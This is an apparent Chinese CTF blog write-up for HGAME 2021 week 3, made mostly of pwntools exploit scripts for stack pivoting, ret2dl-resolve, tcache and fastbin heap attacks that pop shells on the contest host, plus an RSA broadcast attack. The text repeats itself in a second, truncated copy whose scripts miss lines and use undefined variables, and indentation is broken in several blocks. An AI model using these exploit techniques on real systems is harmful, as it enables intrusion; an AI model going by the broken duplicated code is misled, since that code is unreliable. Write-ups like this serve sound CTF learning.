HGAME-WEEK3-WP

博主： chuj
发布时间：2021 年 02 月 21 日
65次浏览
暂无评论
27176字数
分类： CTF-WP

## pwn

### blackgive

栈迁移，不要想复杂了

#### exp

```python
#!/usr/bin/env python
# coding=utf-8
from pwn import *
context(log_level = 'debug')
context.terminal = ['tmux','splitw','-h']

sh = process("./blackgive")
#sh = remote("")
libc = ELF("./libc6_2.27-3ubuntu1.4_amd64.so")
elf = ELF("./blackgive")

pop_rdi_ret = 0x400813
bss_base = 0x6010A0
off = 0xA0

payload = 'paSsw0rd'.ljust(0x20,'\x00')
payload += p64(bss_base + off - 0x8) + p64(0x4007A3)
sh.recvuntil("password:")
#gdb.attach(proc.pidof(sh)[0])
sh.send(payload)
payload = '\x00' * off + p64(pop_rdi_ret) + p64(elf.got['puts']) + p64(elf.sym['puts']) + p64(0x40070a) 
sh.sendlineafter("!\n",payload)

puts_addr = u64(sh.recvuntil('\n',drop = True).ljust(8,'\x00'))
libc_base = puts_addr - libc.sym['puts']

payload = 'paSsw0rd'.ljust(0x20,'\x00')
payload += p64(0) + p64(libc_base + 0x4f432)
sh.sendafter("password:",payload)

sh.interactive()
```

### without_leak

64 位 `ret2dl-resolve` 裸题。由于输出流都被关闭，所以无法实现 leak，考虑进行 `ret2dl-resolve`。由于提供了 `libc`，考虑通过伪造 `link_map` 结构体 getshell。打本地的时候，即便打通了也会有

这个 `Got EOF`，一般这个时候就是说明失败了，而且用 `exec 1>&0` 也无用，导致我浪费了很多时间调试。最后终于想到用 `mkdir` 测试一下才知道成功 getshell 了。

关于调试，由于我们的伪造，`sym->st_other` 是指向 `read@got - 8` 的，也就是 `close@got`，要保证 `close` 被解析过才能正常运行，否则会崩溃。

```python
#!/usr/bin/env python
# coding=utf-8
from pwn import *
context.terminal = ['tmux','splitw','-h']

#sh = process("./without_leak")
sh = remote("182.92.108.71",30483)
elf = ELF("./without_leak")
bss_addr = 0x404B00

def ret2csu_payload(rbx,rbp,call_addr,argv1,argv2,argv3):
    csu1 = 0x40123A
    csu2 = 0x401220
    payload = p64(csu1)
    payload += p64(0) + p64(1) + p64(argv1) + p64(argv2) + p64(argv3) + p64(call_addr)
    payload += p64(csu2)
    payload += p64(0) * 7
    return payload

def fake_Linkmap_payload(elf,fake_linkmap_addr,known_func_ptr,offset):
    plt0 = elf.get_section_by_name('.plt').header.sh_addr
    linkmap = p64(offset & (2 ** 64 - 1))#l_addr
    linkmap += p64(17)#l_name
    linkmap += p64(fake_linkmap_addr + 0x18)#l_ld
    linkmap += p64((fake_linkmap_addr + 0x30 - offset) & (2 ** 64 - 1))#l_next
    linkmap += p64(7)#l_prev
    linkmap += p64(0)#l_real
    linkmap += p64(0)#l_ns
    linkmap += p64(6)#l_libname
    linkmap += p64(known_func_ptr - 8)#l_info[0] tags
    linkmap += '/bin/sh\x00'
    linkmap = linkmap.ljust(0x68,'A')
    linkmap += p64(fake_linkmap_addr)
    linkmap += p64(fake_linkmap_addr + 0x38)
    linkmap = linkmap.ljust(0xf8,'A')
    linkmap += p64(fake_linkmap_addr + 8)

resolve_call = p64(plt0 + 6) + p64(fake_linkmap_addr) + p64(0)
    return (linkmap,resolve_call)

offset = 0x20 + 0x8
payload = '\x00' * offset
libc = ELF("./libc-2.27.so")
log.success('system offset:' + hex(libc.sym['system']))
fake_linkmap_addr = bss_addr + 0x100
linkmap, resolve_call = fake_Linkmap_payload(elf,fake_linkmap_addr,elf.got['read'],libc.sym['system'] - libc.sym['read'])
payload += ret2csu_payload(0,1,elf.got['read'],0,fake_linkmap_addr,len(linkmap))
payload += p64(0x401156)
#sh.sendafter('input> \n',rop.chain().ljust(0x200,'a'))
sh.recvuntil('input> \n')
#gdb.attach(proc.pidof(sh)[0])
sh.send(payload.ljust(0x200,'a'))
sh.send(linkmap)

payload = '\x00' * offset
payload += p64(0x40101a)
payload += p64(0x401243)
payload += p64(fake_linkmap_addr + 0x48)
payload += resolve_call
sh.send(payload.ljust(0x200,'\x00'))

sh.interactive()
```

### todolist

这道题就不说了，和上周的题是几乎一样的

```python
#!/usr/bin/env python
# coding=utf-8
from pwn import *
context(log_level = 'debug')

#sh = process("./todolist")
sh = remote("182.92.108.71",30411)
libc = ELF("./libc-2.27.so") 
def take(size):
    sh.sendlineafter("exit\n",'1')
    sh.sendlineafter("write?\n",str(size))

def delete(index):
    sh.sendlineafter("exit\n",'2')
    sh.sendlineafter("delete?\n",str(index))
  
def edit(payload,index):
    sh.sendlineafter("exit\n",'3')
    sh.sendlineafter("edit?\n",str(index))
    sh.sendlineafter("write?\n",str(len(payload)))
    sh.send(payload)

def show(index):
    sh.sendlineafter("exit\n",'4')
    sh.sendlineafter("check?\n",str(index))

take(2048)#index:0
take(0x100)#index:1

delete(0)
show(0)
libc_base = u64(sh.recv(6).ljust(8,'\x00')) - 0x3ebc40 - 96
log.success("libc_base:" + hex(libc_base))
delete(1)

#malloc_hook = libc_base + libc.symbols["__malloc_hook"]
free_hook = libc_base + libc.symbols["__free_hook"]
#log.success("malloc_hook:" + hex(malloc_hook)) 
#edit(p64(malloc_hook - 0x10),1)
edit(p64(free_hook),1)
take(0x100)#index:2
take(0x100)#index:3

one_gadget = libc_base + 0x4f432
realloc = libc_base + libc.symbols["__libc_realloc"]
#payload = p64(one_gadget) + p64(realloc + 0xa)
payload = p64(one_gadget)
edit(payload,3)

#take(0x200)
delete(0)
sh.interactive()
```

看完之后就觉得这题可以用上周的 exp 来打，所以就 `cp` 了一下上周的，但是没看清所处的目录，一个 tab 一个回车之后我 blackgive 的 exp 就没了。

### Library management System

`off by one`

这个读入函数是会多读一个字节的，所以我们利用他来修改下一个 chunk 的 size 域。做法就是先申请4个 chunk，记作A，B，C，D。由于本题没有修改的功能，所以需要先 `free` A，再`alloc` A，通过对 A `off by one` 修改 chunk B 的 `size` 域，使 chunk B 的 `size`为 B 和 C 的和（这是为了在`free`的时候通过检测。同时这个和需要大于0x80，这样`free`的时候才会进`Unsorted Bin`）实现 `chunk overlapping`，然后 `free`掉 B，再把 B 申请回来就可以通过`show`的功能 leak 出 libc。然后再来一轮，这次先`free`掉 C，再对 B`chunk overlapping`，修改 C 的 fd，使之指向 `&__malloc_hook - 0x23`。指向这个奇怪地址的原因是因为 `fastbin` 会对目标 chunk 的 `size` 做检测

可见 `malloc` 附近并没有可以作为 `size` 。好在 `fastbin` 并不会对地址对齐做检测，所以我们通过字节错位来伪造出 `size`，也就是 从`&__malloc_hook - 0x23` 开始的这个 chunk 了。

就是这样一个效果，我们就可以实现 `arbitrary alloc` 了。

#### exp

```
#!/usr/bin/env python
# coding=utf-8
from pwn import *
context(log_level = 'debug')

#sh = process("./library")
sh = remote("182.92.108.71",30431)
libc = ELF("./libc.so.6")

def Add(size,payload):
    sh.sendlineafter("choice: ",str(1))
    sh.sendlineafter("title: ",str(size))
    sh.sendafter("title: ",payload)

def Delete(index):
    sh.sendlineafter("choice: ",str(2))
    sh.sendlineafter("id: ",str(index))

def Show(index):
    sh.sendlineafter("choice: ",str(3))
    sh.sendlineafter("id: ",str(index))

Add(24,'index:0\n')
Add(48,'index:1\n')
Add(64,'index:2\n')
Add(16,'index:3\n')#avoid top chunk

Delete(0)
Add(24,'a' * 24 + '\x91')
Delete(1)
Add(48,'\n')
Show(1)
sh.recvuntil("is ")
libc_base = u64(sh.recv(6).ljust(8,'\x00')) - (0x3C4B20 + 0x80 + 88)
log.success('libc_base:' + hex(libc_base))
malloc_hook = libc_base + libc.symbols["__malloc_hook"]
alloc_addr = malloc_hook - 0x23
one_gadget = libc_base + 0x4527a
realloc_addr = libc_base + 0x84720

Add(0x40,'index:4\n')
Add(24,'index:5\n')
Add(16,'index:6\n')
Add(0x68,'index:7\n')
Add(16,'index:8\n')#avoid top chunk

Delete(7)
Delete(5)
Add(24,'a' * 24 + '\x91')
Delete(6)

payload = 'a' * 16 + p64(0) + p64(0x71) + p64(alloc_addr)
Add(112,payload + '\n')

Add(0x68,'\n')
Add(0x68,'a' * 0xB + p64(one_gadget) + p64(realloc_addr) + '\n')
sh.sendlineafter("choice: ",str(1))
sh.sendlineafter("title: ",str(16))
#Add(16,'\n')

sh.interactive()
```

### todolist2

看了许久没看出漏洞点，最后终于发现是在 read 函数里

打个 -1 就可以随便输了。

````python
#!/usr/bin/env python
# coding=utf-8
from pwn import *
#context(log_level = 'debug')
context.terminal = ['tmux','splitw','-h']

#sh = process("./todolist2")
sh = remote("182.92.108.71",30521)
libc = ELF("./libc-2.27.so") 
def take(size):
    sh.sendlineafter("exit\n",'1')
    sh.sendlineafter("write?\n",str(size))

def delete(index):
    sh.sendlineafter("exit\n",'2')
    sh.sendlineafter("delete?\n",str(index))
  
def edit(payload,index,size):
    sh.sendlineafter("exit\n",'3')
    sh.sendlineafter("edit?\n",str(index))
    sh.sendlineafter("write?\n",str(size))
    sh.send(payload)

def show(index):
    sh.sendlineafter("exit\n",'4')
    sh.sendlineafter("check?\n",str(index))

take(0x410)#index:0
take(0x410)#index:1
take(0x20)#index:2
delete(0)
delete(1)
take(0x830)#index:3

show(3)
libc_base = u64(sh.recv(6).ljust(8,'\x00')) - 0x3ebc40 - 96
log.success("libc_base:" + hex(libc_base))
malloc_hook = libc_base + libc.symbols["__malloc_hook"]
free_hook = libc_base + libc.symbols["__free_hook"]
log.success("malloc_hook:" + hex(malloc_hook)) 
log.success("free_hook:" + hex(free_hook)) 
one_gadget = libc_base + 0x4f432
log.success("one_gadget:" + hex(one_gadget))
'''----------- above dumped libc ----------'''

take(0x100)#index:4
take(0x100)#index:5
delete(5)
edit('a' * 0x100 + p64(0) + p64(0x111) + p64(free_hook) + '\n',4,-1)
#edit('a' * 0x100 + p64(0) + p64(0x111) + p64(malloc_hook) + '\n',4,-1)
#edit('a' * 0x100 + p64(0) + p64(0x111) + p64(malloc_hook - 0x10) + '\n',4,-1)
take(0x100)#index:6
take(0x100)#index:7

realloc = libc_base + libc.symbols["__libc_realloc"]
#payload = p64(one_gadget) + p64(realloc + 0xa)
payload = p64(one_gadget)
edit(payload,7,len(payload))
#gdb.attach(proc.pidof(sh)[0])
#take(0x200)
delete(2)
sh.interactive()
````

## Crypto

### LikiPrime

先通过[这个网站](http://factordb.com/)分解 $N$，然后通过 `RSA Tool 2 by tE` 直接解出 flag。

### HappyNewYear!!

低指数广播攻击。

```
from gmpy2 import*
from libnum import *

def CRT(a,n):
    sum = 0
    N = reduce(lambda x,y:x*y,n)

for n_i, a_i in zip(n,a):   
        N_i = N // n_i  
        sum += a_i*N_i*invert(N_i,n_i)
    return sum % N

ns = [
768731284506327944113406236027267453153178504481960474163849413572959901900781941471060120664615036667721568236486104212543941626093683611820051956888999990409535944068510533828285247642295156383062225121123397420863524500301605790432399020453905305067131509497931914214431033157498386840010234482484177898191608673445690542041959091445418878375877435164674203776931738708624804301646179653019817596612876848617302959482364008286148292002918372774353441375602500755004724814787928356594079344361596836482525021434616271982920662313256530007883018720585047232121289721656963132683682023625683229940587959315583539720857557451681402228168096559968476948263356605729649774017109848808425693506724312264272613164411551780892434255749213128692122454364559986018251379167331425321803760454026945039856860491038669974395683809854790365463840636343980962376205540013015629307389934488725537142983815565534720739509012176887290320329127809218230756596181528831774086891633290341399153631178022171655153576793324046302349267421556220063264261739968103953460444018066381487941305190730721608513048181450127628562770702172658088836581698332318905758721984778545449145728049393279394785952324627362503706190204128637631213405674863660425389313259,
524955549822701108820249448341549471789542970374297220719644144467046120999708435027269809717491708384591502747843811858599256578006152409861521624800414221049434790169883523654257416906811451131195855586244598374880878692418389200238536952258677438654818096236001665540878733993916070969439309600669058216532381285131220090854384696479702333190547690812990714884526122724065211294733252863353053612662498096532976972273019631446622835704720241172866721075241553118399444619649756067546482948914446034527197029043296867226467390140262361175465932673129685497666662167082114259368591713670044469780955810420060714389043507570707061129150071885165680539302629323340904857078380746639406842784054066196290404127562974351550470732956889057701068241533469665269708040337792974792839671609064624273734488264409908037327963582749939131119285299618565955038449080047185142908091099286222071106259434530841587125509988124634728986309920606439740930811537598857558982632237868734857663853645411122621117175983417162818791869180350737709034243602399686004808133116046260847513863100560285962053110278579574895754928960943506584372424062481234806423574610837438057911596190771344568064718882123247708570545980147637910744997312960997877114875563,
531816715051067911629200567254640608407895151120321915934223550416084055941810057275647124365372164691799815654324843152835621657219143971510794565282438719132189708357084269561390602533348667210778967547331570345307713271797500472800693615897738386357322760213782607288672639158771643480519455699144535885754570631972814751649211026584146963569748660071519399459076694805787216533150149579905553101555997182221446716574345192297201707280470099673168021522276021573255431147391095907444654303966368362618307277890450431646680417082866906543559655835992081835168319097576418799442472634041439781110915814527860626840035884588953837943723302497813966476632638781785524454419556109443369209786353302330932241171298568309190081206636347720214268688100661670856945137179076232753814259674913102806389336950363047338944420468292248719856587641014569194752277829684619803918722245724677129232358305719548783148527753735258295780607510739074337299037254055287750082818921964088131910307180760939784520021579399465657665634960365680711736311232219221704752502361047780644838828947578962833367751773943513294960723081845674700714114613905708967183234219078662548527491691822238226973730089750314606177285702898595711912716069746542235493085749,
493772253520028701228394073791118796898860642546293517165976340880188671501170757992157937835809864375957661380376149183362237960714624594301301578885724183490678033704978135608268473206365825232902155458695063561942608980565675676060170247587203833300205781482210306978615656217675258493239504539762213919984146477146352995349444904282648001338541091894423167804984256356783623092953892148062097076194840351505254447228339051915162949343535017563167413299991340194548813782360554779507722510592683811398509607473468601404587617569337150824778600883884616204746234575349549906287741463102675096118386062231492163458668021511751022439191080507345540921839703382290445797046739813648289321292589201149955672085687445193343364105492343611293348540598587286909499000234416955201612299458282688515658596600656417554161895812046994316423241245289735327450704642000340929459813500971266436908790234452643087694195334024560701562917342963860276789458845939794177422833059051673483227332372905969868740556412782843128761060670334188293944421019131514119696008065850631880588123929581097844255625593530935229341774189341909782979667383762706038731196861300615117475933625813147094849135055190312732335084507955724604696171453417718094964090327,
400814713999150053337202998177245797185153318108582661287579898596310746501291974666347785576673046001863500878959207830917744556274546158919815600936114953314600540036576429657582500764669413652252770861966417840099061248948771555745832102924038855172611675048290264202872791337710865213077945592130795851795718608065812757968780578674701063411377538597424177722558867587781141897676300153523209675996201871155481412772845570976807158049274849081684209479884845355028703657648486318475977716075670243766212910039942550957289189946628261360037565354423094972917371572096203537186108596979722712819213554550645058717286550110465343100499845761528635976859006285823914211739843983972560292482778326983903018873698437828016668821516581220588836782094261582899393704029819851484331592269664479855215056764839779582417486366182524483986373098489636334412671358130389579972838029202609936524996601129648191606117951616875200119129837212604760319073283133589692257497994855882819655018727368441361317788278857721179085847352853038553208639836433059097775135452611114351766229800268321281856140246610438246783364320786390657242414430601000831387967976691362673290089725234013924339500819390840062916754623424132621350706544122257464089409619,
441219832102329113941862838660943233579215441091346336934528023475304109965596676163440394813272558320918420480386749091947802455423402857125233908206867132599069595323243154174569298961794344623241293553421864069389535348543832297805982907650367142721566803315107733852453608111246057981064164247187640480712312060234169292599096087422940380874435851795847673883946134398943282297673922785786134668939454715179979246505182510338437251221569074780060511794395438999419581907256239694239236674604727404688764447352994022067990843174130240669289888289862268588307778029283493265348667415910553064457513926134377522099641209108448559373422305901757344324758407462166774699512993336120173336911210734744313930970281023299709778006083933174113456436965150432387778607639217894522770756209157735203091790545289813873886244335031912734705230434179583023235199153300263399767468586679972093973609985111254951924071949408463935260725701129931726900345186925871556853670570762826122383762006869109981003180805851519716186506371242901187230433096494812063568936279012557322219782284461140361225650340807095328622016565443274256310194921729305097890315074292153303546235677671541793456589738387043928232044507842169173330728718482770626654501523,
320869957563788427035277998523618265705625973417036901203569472342030237447625011870979141578128136960129467546914523329260071050471008896398606988171189642059908517956020915451465313985689287777861360309556861849062064900403692083060786557290591231962941942100771713703136018889848261749140840347546977823595556802430254803837030344591646012857122213227115215674470388548652140381296705772500445572224924018905225174265663584819356114341255408979866800339484643585303306817447453000684770518093577661102544212109378828711785073514863402442870264355300371516683912671007573320059261257897651899697566804513319774954294708303168788292037857134628186553450976637858562675039807897112079750384830264618639239956765667388939331303314191813126254254914926384279494115576997773080256600900034563434959593677148531401160281960526061723479161754555193979726656961515374019212153726594807142456303698775715290518062768887156433902187122160641097916121097179118289646514217696314956474472626420868486152421013284784863653299930875253371982327367991139126828286729539033382650687859412868137579309775440698502848241122394423129771442338402870863767769545005951064956498742874485207824630520777152431261010818838138655082911865834699807375008861]

cs = [
722725267571877807402319081826628305252544883884335241258703688920929757984818470073041479840921480077113183869560758029121565524819466778712481183488277905449328223533043391590093655773827799575075615676500130199172201779452716348108026696828323022993975174610207567571651550333881731147356813019258889551558181283524226640533248278854011492561134943798149661873706769482776061146298693713915393175945083367889987571681776927122583376239974702806044792299381370488664195802017823240811394180509440609967345141141653389746431284893972530735438955464348280960825325776483554008537527538106398207335688261344254017151889931214151508915480961509920681364352778795068266724879364096996252272841617341643666522563974346452491302969822483901472736908002176995244808285202644542949151920310938882432565101197174787422479197405599503943928375781580538374853471395003088467545128060029187794431891563377967647568991772201040537299188867383732391802781253804314567562657951501684710262276597091279719861829006628377575073875781088939946651128183090724290607438597560193321130496240482260573568646971658130695308585240404956802017929673317521572608385674052894773447205932790060730005333539795323555614705817665786476411351969424168366962370578,
341106636902364624537621803937059683829500847731737217024477947229102117868841270816391462580424161421481323287279560344771837711680149251407621544732737892160496443939357041950388493554496406007658435517211507967374859158779641371713073809459356957664870385022506283994639885012608754343497740963582877475346528865751238785898641641562644419639994889039921662499512792397994326679297072288344988329863729467521185656908541750681614296631331948235836697947639517519093825102735706418368162081693311580728579264440449951888361065347124447876814670051679652280281965491150266115964128635848848265679743499256971016535195477416889144131600175159747033626985115139696085153828051183257884668367446309997650590293659781294222777784435987334384194429993199873061206563903159227361936901013994702046575677089263288115905540761147293222721696340819505305497691052766999798297905368576684359681315851605714974267829409740228043899512270242579080482164570677517245195783188509338962785491871370414414487565392656794817257748899014632689366928706013426731920865802714147114118673053353872356444566840336431784793686607763099763915943769968162453433779091468653936247489610842351714130350853888962620401435016019892000066519489369586647822582532,
96655501480984228476843527875038148766862682735216531181731365068856421448884071634422050543257015201836409006098564512948671369804995159104827331853700167554494548064655395947790619030027666553546707921275511050067552520015915189711919816240838635843727117678456359153157042256845391879627204005136329626204082446757707275024018932620919979573721462329490962992796317057293975350138690301006093906543825995442041881912668467639058815752449994459671712370905576936766284703593791336731603543492278087975208438906947966054673189424532474872122585340933934837935650393646216239318131268109344918651250925428018278665569580645117439459587437729735009669592816057201053074978283319149894796397333902672858475161613255814596817201545193202169499144055305358584644635503323032680354835638327999633796089419073741897835010300917603325122563734141907765815188906909017245236242853269976816696795439826925876239600449014662736919205840699787188466436497530759889271878272675511804209502453822900397006767975864334707665149166220819464748535531766670263050223009402082194467219438612279935716319300498861153496030333202808928006701019408354471055774090532330704743753190920815655232618981877529057446430825964256948001465214314349394508264556,
357103586677133190400275535608298307096755517917743991779928165944808156555143364562652658318257441161780966754082431346703420213047464905801347987429587866507784835294289240703319363713980965945263022810877492245609589053923882000898807593180841308987573262209122953930711801088265031627560104571585260900206878593365521048031056818241791513449270437055503002833594299287048995560742435886215547766657105383700364572345248814440024509278757886084274494794572349604428103225636768278633773471700470592729438598821712944805975639637427494951822994991131521067141611563925956037672180261640035716517421681741527507431981163704929952037747170161617798150545493396732644456871805542270699764392127056902381387198947947443962667595072777104565429494042828509588406057498452896606672079600318076629291832964611485077778334984817595747726526804076306703817160053516530370696172218743746676413884784385108888108803420106818173901070897426014100110652172248635456173774009497111567782846079335233333617278837527467186444919584161474044529784043912893406555209016056689227249614906221138535989446685926185643604698806909451119908925728900998397084501277736148437741526619184826982588354997162924650747731826227150677994598866694976617038952960,
196373383105902290020944815248115178565096789884585292930623716947035208071024597949093015291460459688039044997141326097130071826293844614603464306742597764422862382005497313400758917851620553757103374309501021075747571843057781165101330819142446088116279098633113721577451389062207713330184173913814679087349450078308520703743712617560764419518421118924319893700795437644204733301627193873115633309760620284510790535125035058821049861371456491148507101291075161477427293354824377765129256775039894591945559511120167575652522441315757824060660730144970842971698502722588421031575495602989132763560631831054650312859575883607799879434734827000150732042760623153837096529339041007718789464168455505957010471222861988485628012999068075964645262827332446865072284660213544453081529030572364389186506108110484311864485900432885752933720505418233626286434177587041376262805920492740865402092716512672643242061407641167432424410178764502786772854859640601859309316626050634279758623225955757842810086544305493826555445120223896047747445754110537277236254307766447437586975157089685397827540671890607699289450588156013811091193850313213188596446595791898264003078214830341703064110270245588623025485564465677065014954050674151068209958156338,
343558577020588714429313020041093297550600511001840154137552216575748946157961591099597309730875847249609067088895567357040752583678766229661761073029178667941759812656095394713728367061506713413650132129245164858512061430944849306322427733297033654152161512931139895523891447055784674776356336721195602898082264703411052396223706491835615239898963965039349867576628181946954585002705252796231016445166027513456849060948360498081892030697906086173612576083651879166491789946438067179662219651062279317002050789871120333850272751224872129535742685201837098575125361312611392050300073462884046822571642883949673321736837838379514540827860219307938135197101094531402063240331559853201121385391076154875363696159228373299490035401297769928627372721885488091110000395742964536445855367746227395783716581955884641531132839080847770052153020914740561915612109449417203852452084551679817129684835596664222472806271699238429017096741164052056835664191547244480985004136162585874727015248038703376279042870253365410963230937309995702792020342080115661150163434949942290275789227674559517957243060077741816736950124894466197373209308598030218454826136754312091821659566499445097655483610010997986426784494466843809743836689209926943448276851733,
78140898568960172537532399957542065079754785608196175653725188831315142763849427144477433109881196560183622027227087954674199188991855929146336784979764720497547685824735751948676073196869027199411668951578490599507331800328072699193016348570092942269398714025948091737017548105562834031699831877517521836116912407428829037729994348603578694187241194587650053966682616443757430366693816438822541572320426819962696790047344705617241989403482962642561340363553100861232083902828830416053526478120239416765009622649261419311221132287115995483736302156498238644085182807103157307755108774079839474373171678479879270772376918459752331416572057373104068315516826270820079207687778179443170979119272546974948398836020966295976732842161084596604333609962435508857188202619164351406760248161996398928399808794165750688251550333360521545271424876496939865803880625334341137443221883906301968050670219384464251470416581899246708055363762134459566859899715206435140188997349196902765578570516978378759650864568014586614460583304460504318729333658817066272120984875742815218722200593432648242043375439670923950493477821363923796229165231700852653002648050645561521640741356788087870305958215222979881662007309583380284362915245390595921375463156
]

for i in range(0,7):
    for j in range(i + 1,7):
        for k in range(j + 1,7):

e=3
            n1 = ns[i]
            c1 = cs[i]
            n2 = ns[j]
            c2 = cs[j]
            n3 = ns[k]
            c3 = cs[k]

n =[n1,n2,n3] 
            c =[c1,c2,c3]

x = CRT(c,n)

m = iroot(x,e)[0]
            print(n2s(m))
```

可以找到两个片段，拼起来就可以了。

最后修改：2021 年 02 月 22 日 08 : 50 AM

如果觉得我的文章对你有用,那听听上面我喜欢的歌吧

发表评论取消回复

评论 *

私密评论

名称 *

邮箱 *

地址

XCTF/BUU-babyfengshui-WP
评论数： 4
HGAME2021-WEAK1-WP
评论数： 3
第一篇博客！！！
评论数： 2
XCTF-dice_game WP
评论数： 1
Linux(fedora) on U盘安装记
评论数： 0

Ev3r
师傅，我想明白了。。。
Ev3r
师傅，我想问一下letter那里，为什么第一次发payload...
小柠檬
大佬Orz
小柠檬挂树上
冲冲冲！ヾ(≧∇≦*)ゝ
小柠檬挂树上
未来的大佬！前排围观～

BUU-mrctf2020_shellcode_revenge-WP(可见字符shellcode)
评论数： 0
Hello, CTF
评论数： 0
10.19汇编
评论数： 0
10.17汇编
评论数： 0
BUU-bcloud_bctf_2016-WP
评论数： 0

HGAME-WEEK3-WP

chuj • 2021 年 02 月 21 日

## pwn

### blackgive

栈迁移，不要想复杂了

#### exp

```python
#!/usr/bin/env python
# coding=utf-8
from pwn import *
context(log_level = 'debug')
context.terminal = ['tmux','splitw','-h']

sh = process("./blackgive")
#sh = remote("")
libc = ELF("./libc6_2.27-3ubuntu1.4_amd64.so")
elf = ELF("./blackgive")

pop_rdi_ret = 0x400813
bss_base = 0x6010A0
off = 0xA0

puts_addr = u64(sh.recvuntil('\n',drop = True).ljust(8,'\x00'))
libc_base = puts_addr - libc.sym['puts']

payload = 'paSsw0rd'.ljust(0x20,'\x00')
payload += p64(0) + p64(libc_base + 0x4f432)
sh.sendafter("password:",payload)

sh.interactive()
```

### without_leak

关于调试，由于我们的伪造，`sym->st_other` 是指向 `read@got - 8` 的，也就是 `close@got`，要保证 `close` 被解析过才能正常运行，否则会崩溃。

```python
#!/usr/bin/env python
# coding=utf-8
from pwn import *
context.terminal = ['tmux','splitw','-h']

#sh = process("./without_leak")
sh = remote("182.92.108.71",30483)
elf = ELF("./without_leak")
bss_addr = 0x404B00

resolve_call = p64(plt0 + 6) + p64(fake_linkmap_addr) + p64(0)
    return (linkmap,resolve_call)

payload = '\x00' * offset
payload += p64(0x40101a)
payload += p64(0x401243)
payload += p64(fake_linkmap_addr + 0x48)
payload += resolve_call
sh.send(payload.ljust(0x200,'\x00'))

sh.interactive()
```

### todolist

这道题就不说了，和上周的题是几乎一样的

```python
#!/usr/bin/env python
# coding=utf-8
from pwn import *
context(log_level = 'debug')

#sh = process("./todolist")
sh = remote("182.92.108.71",30411)
libc = ELF("./libc-2.27.so") 
def take(size):
    sh.sendlineafter("exit\n",'1')
    sh.sendlineafter("write?\n",str(size))

def show(index):
    sh.sendlineafter("exit\n",'4')
    sh.sendlineafter("check?\n",str(index))

take(2048)#index:0
take(0x100)#index:1

delete(0)
show(0)
libc_base = u64(sh.recv(6).ljust(8,'\x00')) - 0x3ebc40 - 96
log.success("libc_base:" + hex(libc_base))
delete(1)

one_gadget = libc_base + 0x4f432
realloc = libc_base + libc.symbols["__libc_realloc"]
#payload = p64(one_gadget) + p64(realloc + 0xa)
payload = p64(one_gadget)
edit(payload,3)

#take(0x200)
delete(0)
sh.interactive()
```

看完之后就觉得这题可以用上周的 exp 来打，所以就 `cp` 了一下上周的，但是没看清所处的目录，一个 tab 一个回车之后我 blackgive 的 exp 就没了。

### Library management System

`off by one`

就是这样一个效果，我们就可以实现 `arbitrary alloc` 了。

#### exp

```
#!/usr/bin/env python
# coding=utf-8
from pwn import *
context(log_level = 'debug')

#sh = process("./library")
sh = remote("182.92.108.71",30431)
libc = ELF("./libc.so.6")

def Add(size,payload):
    sh.sendlineafter("choice: ",str(1))
    sh.sendlineafter("title: ",str(size))
    sh.sendafter("title: ",payload)

def Delete(index):
    sh.sendlineafter("choice: ",str(2))
    sh.sendlineafter("id: ",str(index))

def Show(index):
    sh.sendlineafter("choice: ",str(3))
    sh.sendlineafter("id: ",str(index))

Add(24,'index:0\n')
Add(48,'index:1\n')
Add(64,'index:2\n')
Add(16,'index:3\n')#avoid top chunk

Add(0x40,'index:4\n')
Add(24,'index:5\n')
Add(16,'index:6\n')
Add(0x68,'index:7\n')
Add(16,'index:8\n')#avoid top chunk

Delete(7)
Delete(5)
Add(24,'a' * 24 + '\x91')
Delete(6)

payload = 'a' * 16 + p64(0) + p64(0x71) + p64(alloc_addr)
Add(112,payload + '\n')

Add(0x68,'\n')
Add(0x68,'a' * 0xB + p64(one_gadget) + p64(realloc_addr) + '\n')
sh.sendlineafter("choice: ",str(1))
sh.sendlineafter("title: ",str(16))
#Add(16,'\n')

sh.interactive()
```

### todolist2

看了许久没看出漏洞点，最后终于发现是在 read 函数里

打个 -1 就可以随便输了。

````python
#!/usr/bin/env python
# coding=utf-8
from pwn import *
#context(log_level = 'debug')
context.terminal = ['tmux','splitw','-h']

#sh = process("./todolist2")
sh = remote("182.92.108.71",30521)
libc = ELF("./libc-2.27.so") 
def take(size):
    sh.sendlineafter("exit\n",'1')
    sh.sendlineafter("write?\n",str(size))

def show(index):
    sh.sendlineafter("exit\n",'4')
    sh.sendlineafter("check?\n",str(index))

take(0x410)#index:0
take(0x410)#index:1
take(0x20)#index:2
delete(0)
delete(1)
take(0x830)#index:3

## Crypto

### LikiPrime

先通过[这个网站](http://factordb.com/)分解 $N$，然后通过 `RSA Tool 2 by tE` 直接解出 flag。

### HappyNewYear!!

低指数广播攻击。

```
from gmpy2 import*
from libnum import *

def CRT(a,n):
    sum = 0
    N = reduce(lambda x,y:x*y,n)

for n_i, a_i in zip(n,a):   
        N_i = N // n_i  
        sum += a_i*N_i*invert(N_i,n_i)
    return sum % N

for i in range(0,7):
    for j in range(i + 1,7):
        for k in range(j + 1,7):

e=3
            n1 = ns[i]
            c1 = cs[i]
            n2 = ns[j]
            c2 = cs[j]
            n3 = ns[k]
            c3 = cs[k]

n =[n1,n2,n3] 
            c =[c1,c2,c3]

x = CRT(c,n)

m = iroot(x,e)[0]
            print(n2s(m))
```

可以找到两个片段，拼起来就可以了。

发表评论 取消回复

HGAME-WEEK3-WP

发表评论取消回复